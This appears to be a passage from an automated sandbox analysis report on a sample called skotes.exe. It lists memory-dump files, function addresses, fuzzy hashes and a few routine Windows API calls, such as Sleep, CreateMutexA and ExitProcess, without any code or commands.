Associated: 00000001.00000002.1871286357.0000000000B01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871301786.0000000000B02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871318304.0000000000B09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871336545.0000000000B17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871351974.0000000000B19000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7f0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: fda4241c6d23a700e5d293654340def85fc09f9d1dba833ee404dc48b00e5341
Instruction ID: df1feb7129b03875111b80524271f741adfefbae7dbcee4e6e08705def62e608
Opcode Fuzzy Hash: fda4241c6d23a700e5d293654340def85fc09f9d1dba833ee404dc48b00e5341
Instruction Fuzzy Hash: 1B214BB1348209EAF729A7AC9CDA73DB251EF91301F200516E34CD73D1DABE59819153

Function 007FA34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 007FA963
CreateMutexA.KERNELBASE(00000000,00000000,00853254), ref: 007FA981

Memory Dump Source

Source File: 00000001.00000002.1870379278.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 007F0000, based on PE: true

Associated: 00000001.00000002.1870363907.00000000007F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870379278.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870436463.0000000000859000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870452759.000000000085B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870471187.0000000000867000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870571380.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870590813.00000000009CC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870610980.00000000009DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870610980.00000000009E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870647540.00000000009EA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870667832.00000000009EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870685718.00000000009EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870703174.00000000009EF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870719909.00000000009F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870737422.00000000009F1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870756847.00000000009FC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870774962.0000000000A01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870790330.0000000000A02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870809087.0000000000A03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870828509.0000000000A19000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870845141.0000000000A1A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870860197.0000000000A1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870875908.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870891656.0000000000A24000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870908519.0000000000A2E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870935140.0000000000A54000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870951071.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870967124.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870984439.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871001796.0000000000A5D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871018488.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871034283.0000000000A65000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871050636.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871066600.0000000000A71000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871081876.0000000000A74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871098485.0000000000A7C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871114885.0000000000A81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871132734.0000000000A88000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871149553.0000000000A8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871169372.0000000000A93000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871185633.0000000000A95000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871205402.0000000000AA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871221156.0000000000AA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871221156.0000000000AD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871267995.0000000000B00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871286357.0000000000B01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871301786.0000000000B02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871318304.0000000000B09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871336545.0000000000B17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871351974.0000000000B19000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7f0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 14b949d8dea0837ea29602125a070f13701ab84fb2dedd5ae7d0c3b5dc86bcdd
Instruction ID: 7c1c8f5b2db24e1ea858d2d05585b7ab44fd7ccc2c8888614e10ccbfe59a7160
Opcode Fuzzy Hash: 14b949d8dea0837ea29602125a070f13701ab84fb2dedd5ae7d0c3b5dc86bcdd
Instruction Fuzzy Hash: 30216771644208ABEB08DB6CEC8573CB766EFD1316F204229E618D77D5E77E65808252

Non-executed Functions

Function 0082CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0082CC66

Memory Dump Source

Source File: 00000001.00000002.1870379278.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 007F0000, based on PE: true

Associated: 00000001.00000002.1870363907.00000000007F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870379278.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870436463.0000000000859000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870452759.000000000085B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870471187.0000000000867000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870571380.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870590813.00000000009CC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870610980.00000000009DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870610980.00000000009E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870647540.00000000009EA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870667832.00000000009EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870685718.00000000009EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870703174.00000000009EF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870719909.00000000009F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870737422.00000000009F1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870756847.00000000009FC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870774962.0000000000A01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870790330.0000000000A02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870809087.0000000000A03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870828509.0000000000A19000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870845141.0000000000A1A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870860197.0000000000A1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870875908.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870891656.0000000000A24000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870908519.0000000000A2E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870935140.0000000000A54000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870951071.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870967124.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870984439.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871001796.0000000000A5D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871018488.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871034283.0000000000A65000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871050636.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871066600.0000000000A71000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871081876.0000000000A74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871098485.0000000000A7C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871114885.0000000000A81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871132734.0000000000A88000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871149553.0000000000A8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871169372.0000000000A93000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871185633.0000000000A95000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871205402.0000000000AA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871221156.0000000000AA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871221156.0000000000AD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871267995.0000000000B00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871286357.0000000000B01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871301786.0000000000B02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871318304.0000000000B09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871336545.0000000000B17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871351974.0000000000B19000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7f0000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction ID: b67bd336fbe811090e2c68887c1820711d55ffb69af978454e609a2fb036aa1a
Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction Fuzzy Hash: 12B16732D002A99FDB15CF28D8817BEBFE5FF45340F25416AE845EB242D6349D81CBA1

Function 007F2EC0 Relevance: 6.3, APIs: 4, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 007F2F5F
__Mtx_unlock.LIBCPMT ref: 007F2FCC
__Mtx_unlock.LIBCPMT ref: 007F30F5
__Mtx_unlock.LIBCPMT ref: 007F319B

Memory Dump Source

Source File: 00000001.00000002.1870379278.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 007F0000, based on PE: true

Associated: 00000001.00000002.1870363907.00000000007F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870379278.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870436463.0000000000859000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870452759.000000000085B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870471187.0000000000867000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870571380.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870590813.00000000009CC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870610980.00000000009DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870610980.00000000009E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870647540.00000000009EA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870667832.00000000009EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870685718.00000000009EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870703174.00000000009EF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870719909.00000000009F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870737422.00000000009F1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870756847.00000000009FC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870774962.0000000000A01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870790330.0000000000A02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870809087.0000000000A03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870828509.0000000000A19000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870845141.0000000000A1A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870860197.0000000000A1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870875908.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870891656.0000000000A24000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870908519.0000000000A2E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870935140.0000000000A54000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870951071.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870967124.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870984439.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871001796.0000000000A5D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871018488.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871034283.0000000000A65000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871050636.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871066600.0000000000A71000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871081876.0000000000A74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871098485.0000000000A7C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871114885.0000000000A81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871132734.0000000000A88000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871149553.0000000000A8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871169372.0000000000A93000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871185633.0000000000A95000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871205402.0000000000AA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871221156.0000000000AA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871221156.0000000000AD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871267995.0000000000B00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871286357.0000000000B01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871301786.0000000000B02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871318304.0000000000B09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871336545.0000000000B17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871351974.0000000000B19000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7f0000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock
String ID:
API String ID: 1418687624-0
Opcode ID: 1805acf8e0da71b2fdef9f4b3d6ba45121ee23f4d7ef3c80deb6bcb609c7552a
Instruction ID: f05490d3da8204260668f15fd8e016eefe485fc98b78ed1e6711c11e04ff8239
Opcode Fuzzy Hash: 1805acf8e0da71b2fdef9f4b3d6ba45121ee23f4d7ef3c80deb6bcb609c7552a
Instruction Fuzzy Hash: FBA1D2709016099FDB20DF68CD44B6AB7A8FF15310F04422AE915D7391EB39EA04CB92

Analysis Process: skotes.exePID: 4900, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	602
Total number of Limit Nodes:	4

Executed Functions

Function 0082652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,0082652A,?,?,?,?,?,00827661), ref: 00826566

Memory Dump Source

Source File: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 007F0000, based on PE: true

Associated: 00000002.00000002.1873400634.00000000007F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873417198.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873483948.0000000000859000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873505010.000000000085B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873525420.0000000000867000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873639358.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873657038.00000000009CC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873678925.00000000009DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873678925.00000000009E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873719330.00000000009EA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873738206.00000000009EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873757897.00000000009EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873777719.00000000009EF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873795366.00000000009F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873811521.00000000009F1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873832926.00000000009FC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873855205.0000000000A01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873872768.0000000000A02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873889895.0000000000A03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873914727.0000000000A19000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873933730.0000000000A1A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873951041.0000000000A1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873967479.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873988739.0000000000A24000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874010902.0000000000A2E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874036027.0000000000A54000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874052498.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874068703.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874088061.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874108218.0000000000A5D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874126370.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874142727.0000000000A65000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874159841.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874177423.0000000000A71000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874202708.0000000000A74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874221065.0000000000A7C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874238807.0000000000A81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874255412.0000000000A88000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874271980.0000000000A8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874289352.0000000000A93000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874305792.0000000000A95000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874326138.0000000000AA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874343234.0000000000AA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874343234.0000000000AD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874393364.0000000000B00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874411678.0000000000B01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874427915.0000000000B02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874445809.0000000000B09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874463427.0000000000B17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874479484.0000000000B19000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: c1284cdd54e9435db56658912c76ccf8d8b328c3d5637144163b5c22b141b044
Instruction ID: d508410f598474db87942d16e316aa0a8ad47954ccf54b82d43abe80a4e4ba00
Opcode Fuzzy Hash: c1284cdd54e9435db56658912c76ccf8d8b328c3d5637144163b5c22b141b044
Instruction Fuzzy Hash: 4EE08C30142528ABCF27BF58EA09E583BA9FF61748F400810F904DA225DB25EED2C6A1

Function 007F9BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 007FA963
CreateMutexA.KERNELBASE(00000000,00000000,00853254), ref: 007FA981

Memory Dump Source

Source File: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 007F0000, based on PE: true

Associated: 00000002.00000002.1873400634.00000000007F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873417198.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873483948.0000000000859000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873505010.000000000085B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873525420.0000000000867000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873639358.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873657038.00000000009CC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873678925.00000000009DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873678925.00000000009E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873719330.00000000009EA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873738206.00000000009EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873757897.00000000009EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873777719.00000000009EF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873795366.00000000009F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873811521.00000000009F1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873832926.00000000009FC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873855205.0000000000A01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873872768.0000000000A02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873889895.0000000000A03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873914727.0000000000A19000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873933730.0000000000A1A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873951041.0000000000A1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873967479.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873988739.0000000000A24000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874010902.0000000000A2E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874036027.0000000000A54000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874052498.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874068703.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874088061.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874108218.0000000000A5D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874126370.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874142727.0000000000A65000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874159841.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874177423.0000000000A71000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874202708.0000000000A74000.00000040.00000001.01000000.00000007.sdmpDownload File
